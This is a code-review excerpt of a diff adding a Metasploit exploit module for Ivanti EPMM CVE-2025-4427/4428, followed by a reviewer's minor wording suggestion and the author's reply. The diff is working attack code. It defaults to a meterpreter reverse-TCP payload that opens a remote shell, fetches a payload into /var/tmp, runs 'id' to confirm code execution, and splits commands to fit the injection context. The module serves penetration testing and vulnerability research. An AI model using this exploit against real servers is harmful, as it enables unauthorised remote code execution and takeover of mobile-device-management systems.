modules/exploits/multi/http/ivanti_epmm_rce_cve_2025_4427_4428.rb

```diff
@@ -0,0 +1,142 @@
+          # First published PoC
+          ['URL', 'https://github.com/watchtowrlabs/watchTowr-vs-Ivanti-EPMM-CVE-2025-4427-CVE-2025-4428'],
+          # Non-blind payload
+          ['URL', 'https://blog.eclecticiq.com/china-nexus-threat-actor-actively-exploiting-ivanti-endpoint-manager-mobile-cve-2025-4428-vulnerability']
+        ],
+        'DisclosureDate' => '2025-05-13',
+        # Runs as the 'tomcat' user
+        'Privileged' => false,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD],
+        'DefaultTarget' => 0,
+        'Targets' => [ [ 'Default', {} ] ],
+        'DefaultOptions' => {
+          # cwd is not writable, so use /var/tmp, which is on an executable partition and can be written to
+          'FETCH_WRITABLE_DIR' => '/var/tmp',
+          # After updating Metasploit, the payload began defaulting to aarch64 for some reason
+          # Specifying x64 here to ensure a sane default
+          'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp'
+        },
+        'Notes' => {
+          # Confirmed to work multiple times in a row and concurrently
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptString.new('TARGETURI', [true, 'The base path to Ivanti EPMM', '/']),
+        OptBool.new('SSL', [true, 'Negotiate SSL/TLS for outgoing connections', true])
+      ]
+    )
+  end
+
+  def check
+    # Execute 'id' to check if target is vulnerable (version check via exploitation, best known approach)
+    resp = execute_command('id')
+    return CheckCode::Unknown('Failed to get a response from the target') unless resp
+
+    # The response body format will vary across versions, so check for presence of 'id' output
+    if resp.body.include?('uid=') && resp.body.include?('gid=')
+      return CheckCode::Vulnerable('Successfully executed command')
+    else
+      return CheckCode::Safe('Target does not appear to be vulnerable - command output not returned')
+    end
+  end
+
+  def execute_command(cmd)
+    # Since the execution context only supports one command at a time, split on fetch payload semicolons
+    commands = cmd.split(';')
+    resp = nil
+
+    commands.each_with_index do |command, index|
+      command = command.strip
+      next if command.empty?
+
+      # An update to Metasploit in early 2025 changed the way that fetch payloads are constructed
+      # Previously, fetch payloads appended " &" to the execution command, but now only "&" is appended
+      # For example, "/var/tmp/EHDjrJnB &" -> "/var/tmp/EHDjrJnB&"
+      # The expression language execution context doesn't like it unless there's a space, so we add one
+      command = command.gsub('&', ' &')
+
+      vprint_status("Payload pt. #{index + 1}/#{commands.length}: #{command}")
```

Comment:
```suggestion
      vprint_status("Payload part #{index + 1}/#{commands.length}: #{command}")
```

There is no char limit here, it's ok to be a bit more verbose :)

Reply:
Thanks! I'll make this change.